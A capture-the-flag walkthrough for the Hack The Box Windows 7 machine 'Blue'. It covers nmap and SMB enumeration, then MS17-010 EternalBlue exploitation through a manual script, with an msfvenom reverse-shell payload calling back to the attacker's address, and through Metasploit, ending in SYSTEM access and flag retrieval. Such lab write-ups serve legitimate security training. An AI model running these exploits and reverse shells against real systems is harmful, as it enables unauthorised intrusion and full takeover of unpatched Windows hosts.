HTB - Blue
The given box Blue is a Windows machine with an IP address of 10.10.10.40
Recon
Nmap Scan Result
On performing a nmap scan on the target, we can see there are 3 standard ports open
1. msrpc -135
2. netbios-ssn - 139
3. SMB - 445
And also it discovered that the machine is running Windows 7 Professional 7601 Service Pack 1 OS
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ sudo nmap -sC -sV -A 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 17:52 IST
Nmap scan report for 10.10.10.40
Host is up (0.28s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=9/15%OT=135%CT=1%CU=38623%PV=Y%DS=2%DC=T%G=Y%TM=6141E5
OS:ED%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS
OS:=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M
OS:54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -13m38s, deviation: 34m35s, median: 6m19s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-09-15T13:30:22+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-15T12:30:21
|_ start_date: 2021-09-15T12:28:12
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 351.26 ms 10.10.14.1
2 351.39 ms 10.10.10.40
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.55 seconds
Enumeration
Enumerating with smbmap
We know that the port 445 is open, so we can definitely perform SMB enumeration to find whether the SHARES in the SMB is accessible or not.
```c
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.40
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
It didn’t list out the shares from SMB
NOTE
If enumerating SMB shares with smbmap fails, try it with wrong/guest username and password combinations
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.40 -u moni
[+] Guest session IP: 10.10.10.40:445 Name: 10.10.10.40
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
Share READ ONLY
Users READ ONLY
So, we can access Share and Users SMB share from the machine
Enumerating with smbclient
Now, lets enumerate these SMB shares with smbclient to check for any clues
Listing Share SMB share,
```c
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbclient -N //10.10.10.40/Share
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jul 14 19:18:44 2017
.. D 0 Fri Jul 14 19:18:44 2017
8362495 blocks of size 4096. 4258863 blocks available
smb: \>
Listing Users SMB share,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ smbclient -N //10.10.10.40/Users 130 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri Jul 21 12:26:23 2017
.. DR 0 Fri Jul 21 12:26:23 2017
Default DHR 0 Tue Jul 14 12:37:31 2009
desktop.ini AHS 174 Tue Jul 14 10:24:24 2009
Public DR 0 Tue Apr 12 13:21:29 2011
8362495 blocks of size 4096. 4258863 blocks available
smb: \> cd Public
smb: \Public\> ls
. DR 0 Tue Apr 12 13:21:29 2011
.. DR 0 Tue Apr 12 13:21:29 2011
desktop.ini AHS 174 Tue Jul 14 10:24:24 2009
Documents DR 0 Tue Jul 14 10:38:56 2009
Downloads DR 0 Tue Jul 14 10:24:24 2009
Favorites DHR 0 Tue Jul 14 08:04:59 2009
Libraries DHR 0 Tue Jul 14 10:24:24 2009
Music DR 0 Tue Jul 14 10:24:24 2009
Pictures DR 0 Tue Jul 14 10:24:24 2009
Recorded TV DR 0 Tue Apr 12 13:21:29 2011
Videos DR 0 Tue Jul 14 10:24:24 2009
8362495 blocks of size 4096. 4258863 blocks available
smb: \Public\> cd Documents
smb: \Public\Documents\> ls
. DR 0 Tue Jul 14 10:38:56 2009
.. DR 0 Tue Jul 14 10:38:56 2009
desktop.ini AHS 278 Tue Jul 14 10:24:24 2009
8362495 blocks of size 4096. 4258863 blocks available
smb: \Public\Documents\> cd ..
smb: \Public\> cd Downloads
smb: \Public\Downloads\> ls
. DR 0 Tue Jul 14 10:24:24 2009
.. DR 0 Tue Jul 14 10:24:24 2009
desktop.ini AHS 174 Tue Jul 14 10:24:24 2009
8362495 blocks of size 4096. 4258863 blocks available
smb: \Public\Downloads\> cd ..
smb: \Public\> ls
. DR 0 Tue Apr 12 13:21:29 2011
.. DR 0 Tue Apr 12 13:21:29 2011
desktop.ini AHS 174 Tue Jul 14 10:24:24 2009
Documents DR 0 Tue Jul 14 10:38:56 2009
Downloads DR 0 Tue Jul 14 10:24:24 2009
Favorites DHR 0 Tue Jul 14 08:04:59 2009
Libraries DHR 0 Tue Jul 14 10:24:24 2009
Music DR 0 Tue Jul 14 10:24:24 2009
Pictures DR 0 Tue Jul 14 10:24:24 2009
Recorded TV DR 0 Tue Apr 12 13:21:29 2011
Videos DR 0 Tue Jul 14 10:24:24 2009
8362495 blocks of size 4096. 4258863 blocks available
smb: \Public\> cd ..
smb: \> ls
. DR 0 Fri Jul 21 12:26:23 2017
.. DR 0 Fri Jul 21 12:26:23 2017
Default DHR 0 Tue Jul 14 12:37:31 2009
desktop.ini AHS 174 Tue Jul 14 10:24:24 2009
Public DR 0 Tue Apr 12 13:21:29 2011
8362495 blocks of size 4096. 4258863 blocks available
smb: \> cd Default
smb: \Default\> ls
. DHR 0 Tue Jul 14 12:37:31 2009
.. DHR 0 Tue Jul 14 12:37:31 2009
AppData DHn 0 Tue Jul 14 08:50:08 2009
Desktop DR 0 Tue Jul 14 08:04:59 2009
Documents DR 0 Tue Jul 14 10:38:56 2009
Downloads DR 0 Tue Jul 14 08:04:59 2009
Favorites DR 0 Tue Jul 14 08:04:59 2009
Links DR 0 Tue Jul 14 08:04:59 2009
Music DR 0 Tue Jul 14 08:04:59 2009
NTUSER.DAT AHSn 262144 Sat Jul 15 04:07:57 2017
NTUSER.DAT.LOG AH 1024 Tue Apr 12 13:24:55 2011
NTUSER.DAT.LOG1 AH 189440 Mon Jul 17 01:52:24 2017
NTUSER.DAT.LOG2 AH 0 Tue Jul 14 08:04:08 2009
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Tue Jul 14 10:15:54 2009
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Tue Jul 14 10:15:54 2009
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Tue Jul 14 10:15:54 2009
Pictures DR 0 Tue Jul 14 08:04:59 2009
Saved Games Dn 0 Tue Jul 14 08:04:59 2009
Videos DR 0 Tue Jul 14 08:04:59 2009
8362495 blocks of size 4096. 4258863 blocks available
smb: \Default\> cd Desktop
smb: \Default\Desktop\> ls
. DR 0 Tue Jul 14 08:04:59 2009
.. DR 0 Tue Jul 14 08:04:59 2009
8362495 blocks of size 4096. 4258863 blocks available
smb: \Default\Desktop\>
So there is not any useful data from the above SMB shares
We have to find other possible vulnerability to break in, and SMB protocol is the only path we can utilize
Nmap script scan
Lets use nmap scripts for detecting these vulnerability,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ ls /usr/share/nmap/scripts | grep smb-vuln 130 ⨯
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse
These are the possible vulnerabilities we can expect in SMB protocol, lets use these scripts to test it on our machine’s SMB
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ sudo nmap --script smb-vuln* -p 445 -A 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 18:06 IST
Nmap scan report for 10.10.10.40
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 329.56 ms 10.10.14.1
2 329.73 ms 10.10.10.40
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.42 seconds
We have got a hit on smb-vuln-ms17-010 vulnerability
Finding suitable exploit with searchsploit
Lets check a suitable exploit for smb-vuln-ms17-010 using searchsploit/exploit-db database
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Blue]
└─$ searchsploit ms17-010
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
It seems like we have a metasploit exploit and also other manual exploits for this vulnerability
Gaining Access
MS17-010 Manual Exploit
While searching for manual exploits there are many methods and scripts
For exploiting Eternal Blue vulnerability , I would suggest you to take a look on this repo
This repo contains all flavours of ms17-010 exploits ranging from Windows XP - Windows 8
For this manual exploit, we will be using send_and_execute.py script to execute our own payload into the machine
In this case our payload will be a backdoor/reverse_shell
Lets configure our reverse_shell using msfvenom
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=6767 -f exe -o backdoor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: backdoor.exe
After installing all dependencies for the script, lets execute it
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Blue/MS17-010]
└─$ python send_and_execute.py 10.10.10.40 backdoor.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Not found accessible named pipe
Done
This script failed, because it cannot find an accessible named pipe
Its the same problem when we tried to enumerate SMB using smbmap
Sometimes default creds won’t work for SMB, you have to explicitly mention the creds
Modifying this line in send_and_execute.py
USERNAME = 'guest'
Now lets try the exploit again,
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Blue/MS17-010]
└─$ python send_and_execute.py 10.10.10.40 backdoor.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001ca0020
SESSION: 0xfffff8a00e21f060
FLINK: 0xfffff8a001399048
InParam: 0xfffff8a00844715c
MID: 0x3807
unexpected alignment, diff: 0x-70aefb8
leak failed... try again
CONNECTION: 0xfffffa8001ca0020
SESSION: 0xfffff8a00e21f060
FLINK: 0xfffff8a008459088
InParam: 0xfffff8a00845315c
MID: 0x3803
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file UFY6OQ.exe...
Opening SVCManager on 10.10.10.40.....
Creating service MasR.....
Starting service MasR.....
The NETBIOS connection with the remote host timed out.
Removing service MasR.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
It worked and spawned our reverse shell to our netcat listener
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc -nlvp 6767
listening on [any] 6767 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.40] 49159
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
MS17-010 Metasploit Exploit
For metasploit exploit, there is no need to worry about dependencies and exploit code
We can simply exploit the ms17-010 Eternal Blue vulnerability by configuring our remote and listener
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windo
ws 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7
, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows
Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.88 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.8
LHOST => 10.10.14.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.40:49158) at 2021-09-15 18:19:01 +0530
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege
meterpreter > pwd
C:\Windows\system32
meterpreter > cd ../../
meterpreter > cd Users
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 8192 dir 2017-07-21 12:26:23 +0530 Administrator
40777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 All Users
40555/r-xr-xr-x 8192 dir 2009-07-14 08:50:08 +0530 Default
40777/rwxrwxrwx 0 dir 2009-07-14 10:38:56 +0530 Default User
40555/r-xr-xr-x 4096 dir 2009-07-14 08:50:08 +0530 Public
100666/rw-rw-rw- 174 fil 2009-07-14 10:24:24 +0530 desktop.ini
40777/rwxrwxrwx 8192 dir 2017-07-14 19:15:33 +0530 haris
meterpreter > cat haris/Desktop/user.txt
<---USER FLAG--->
meterpreter > cat Administrator/Desktop/root.txt
<---ROOT FLAG--->
meterpreter >